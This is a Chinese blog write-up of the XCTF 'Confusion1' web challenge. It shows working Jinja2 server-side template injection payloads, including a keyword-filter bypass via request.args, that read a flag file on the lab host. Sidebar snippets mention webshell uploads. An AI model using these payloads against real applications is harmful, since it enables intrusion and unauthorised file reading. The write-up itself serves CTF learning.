xctf攻防世界 Web高手进阶区 Confusion1

最新推荐文章于 2024-04-09 16:45:15 发布
最新推荐文章于 2024-04-09 16:45:15 发布
阅读量1.8k 收藏 8
点赞数 5
分类专栏: 攻防世界web之路 文章标签: 前端 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l8947943/article/details/122241240
版权

1. 直接进入场景,查看环境

在这里插入图片描述

2. 分析

  1. 映入眼帘的是神马奇葩玩意?
    思考了一下,蟒蛇(Python)?大象(ElePHPant)?两个扭扯想说明啥?。。不懂
  2. 打开控制台,看看有没有提示
    戳一戳链接,发现longin页面和register页面都有如下信息
    在这里插入图片描述
    emmm,按时flag的位置?
  3. blue-whale是什么破玩意?
    点完后更加懵逼了,大胆猜测,需要审计源码,那么尝试.git漏洞,看能不能搞到源码,如图
    在这里插入图片描述
    得,没戏,看看robots.txt同样的显示,说明不能看到源码。
  4. 如何访问到提示的flag内容
    大胆猜测,需要尝试SSTI(服务器模板注入)漏洞,从而拿到flag。
    参考思路:在这里插入图片描述
    尝试构造payload,{{7*7}}
http://111.200.241.244:62326/register.php/{{7*7}}}

如图:
在这里插入图片描述
说明SSTI漏洞,继续测试{{7*‘7’}}

http://111.200.241.244:62326/register.php/{{7*'7'}}}

如图:
在这里插入图片描述
锁定,是Jinja2或Twig模板

  1. 采用之前使用的payload,{{’’.class.mro[2].subclasses()}}
http://111.200.241.244:62326/register.php/{{''.__class__.__mro__[2].__subclasses__()}}

弹窗提示:
在这里插入图片描述
也就是说,这些关键词被过滤了。。。class、 subclasses、 read尝试后都不行。尝试采用url_for

http://111.200.241.244:62326/register.php/{{url_for.__globals__}}

如图:
在这里插入图片描述
有鉴权,也就是被过滤了。给我直接整不会了。。。想不出来,去参考大神们的wp了。

  1. 采用request.args.key方式传参
    这个方法开眼界,第一次知道。构造payload:
http://111.200.241.244:62326/{{''[request.args.a]}}?a=__class__

如图:
在这里插入图片描述
妈耶,真的可以绕过,有回显了。。。这就可以玩了,构造目标payload

http://111.200.241.244:62326/register.php/{{''[request.args.a][request.args.b][2][request.args.c]()[40]('/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt')[request.args.d]()}}?a=__class__&b=__mro__&c=__subclasses__&d=read

如图:
在这里插入图片描述
构造的参考理由:关于python魔术方法payload

3. 总结

  • 考察模板注入
  • payload的其他构造方法

附带大神总结的内容:

  1. 文末SSTI几个学习场景
  2. SSTI(模板注入)基础总结

如有问题,恳请批评指正。

l8947943
关注
  • 5
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
【网络安全 | XCTFConfusion1
等风来
12-29 1667
该题考察SSTI注入。题目描述: 某天,Bob说:PHP是最好的语言,但是Alice不赞同。所以Alice编写了这个网站证明。在她还没有写完的时候,我发现其存在问题。(请不要使用扫描器)
XCTF攻防世界web.doc
09-19
XCTF攻防世界Web WriteUp】 在网络安全竞赛中,CTF(Capture The Flag)是一种常见的形式,其中“XCTF攻防世界”是一个专注于Web安全的平台,旨在帮助参与者提升网络安全技能,特别是Web应用的安全防御和攻击能力...
XCTF 4th-QCTF-2018 Confusion1
feng的博客
10-31 695
知识点 SSTI模板注入 猜图(狗头) WP 进入环境可以发现啥都没有,重要的是这个图: 想办法联想到这个: 知道和python相关。。。(狗头) 首先访问login.php和register.php,发现都是404。经过一系列尝试,发现这个网站只有index.php,但是404的页面响应头里有这个: <!--Flag @ /opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt--> 因此知道了flag文件的位置,但是不知道怎么去读取这个文件。 其
XCTF相关题解Confusion1,easyphp文件包含,lottery,ics-05,easytornado(框架)
qq_62097048的博客
11-20 888
做的相关题目,也查阅了相关的wp,希望对新手有帮助
BlueCMS_v1.6漏洞挖掘——GetShell
渗透测试
09-15 1679
BlueCMS_v1.6漏洞挖掘——GetShell 渗透思路: 1. 进入网站 2. 扫描后台 3. 百度blueCMS相关漏洞(最好是后台) 4. 进入后台 5. 查看是否有上传文件入口 6. 上传一句话木马(如果有类型防护,可以转图片木马) 7. 查看是否有文件包含漏洞 8. 修改指定文件,把木马写进去 9. 菜刀getshell 视频链接 BlueCMSv1.6漏洞GetShell
攻防世界--Confusion1
m0_67467924的博客
05-30 303
a=__class__&b=__mro__&c=__subclasses__查找可以使用的基类,使用base报错,但是mro可以,我不懂,先做着吧{{''[request.args.a][request.args.b]}}?
攻防世界-Confusion1
m0_49025459的博客
02-14 631
访问题目场景某天,Bob说:PHP是最好的语言,但是Alice不赞同。所以Alice编写了这个网站证明。在她还没有写完的时候,我发现其存在问题。(请不要使用扫描器)然后结合图片我们知道,这个网址是python写的,那python语言书写的网址,存在最多的大概率是SSTI模板注入。
XCTF-RE】新手练习-maze
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/fr45py
XCTF-RE】新手练习-logmein
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ez5t60
web 2.11 upload1.md
12-16
xctf
XCTF-RE】新手练习-insanity
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/siwtcm
攻防世界 web高手进阶 7分题Confusion1
闵行小鱼塘
10-11 2872
继续ctf的旅程,开始攻防世界web高手进阶的7分题,本文是Confusion1的writeup
攻防世界Confusion1
qq_43774856的博客
12-09 788
Confusion1 打开链接,如图所示 点击login,发现无法访问,查看一下源码,有flag的信息 看了题解后知道是SSTI 使用{{7*7}} 最常用的 {{''.__class__.__mro__[2].__subclasses__()}} 发现被过滤了 经过测试,过滤了很多关键字,如class,subclasses等。 这里使用request.args.t1且以GET方式提交t1=__class__来替换被过滤的__class__ {{''.__class__}} => {{''[
攻防世界writeup
飞鱼的企鹅的博客
01-04 830
攻防世界 confusion1 第一次接触这样的漏洞,认真学习了一波 0x00题目介绍 打开是一个网站,有登陆注册功能,正中间还有一张图片(后来才知道代表php vs python) 但是点击登陆注册都显示404,就很迷了,之后又去扫描了网站,并没有发现什么有用的东西 偶然间查看页面源代码,发现了端倪 这个404界面暗藏玄机啊!但还是不知道怎么做这道题 0xo1查阅资料 其实就是查看wp…...
【愚公系列】2023年05月 攻防世界-WebConfusion1)
时光隧道
05-27 7839
SSTI漏洞(Server Side Template Injection,服务端模板注入漏洞)是一种 web 应用程序中的安全漏洞,它允许攻击者通过在模板中注入恶意代码,执行服务器端的任意代码。模板通常用于 web 应用程序中的动态内容生成,这些模板经常包含逻辑控制语句和变量插入。攻击者可以利用模板中缺乏输入验证和过滤来注入任意的代码,从而实现任意代码执行,甚至是远程命令执行。SSTI漏洞是一种危险性较高的漏洞,因为攻击者可以完全控制服务器端执行的代码和结果。
攻防世界----confusion1
qq_44418229的博客
07-22 1216
攻防世界----confusion1 如何确定是SSTI漏洞; 确定后要怎么绕过
攻防世界Confusion1
最新发布
wangzhemvp的博客
04-09 549
request 是 Flask 框架的一个全局对象 , 表示 " 当前请求的对象( flask.request ) "。所以我们可以利用request.args绕过输入黑名单,进行沙箱逃逸。php的标志是大象,Python的标志是蛇。Python 的 Flask 框架( Flask 使用 Jinja2 作为模板引擎 )输入 {{config}} 也有回显,ssti。过滤了关键字,并未过滤request。点进register.php。
攻防世界WEB】难度四星12分进阶题:Confusion1
07-23 743
攻防世界WEB】四星12分
攻防世界-web-Confusion1
wuh2333的博客
11-22 188
攻防世界web,SSTI
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

l8947943

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值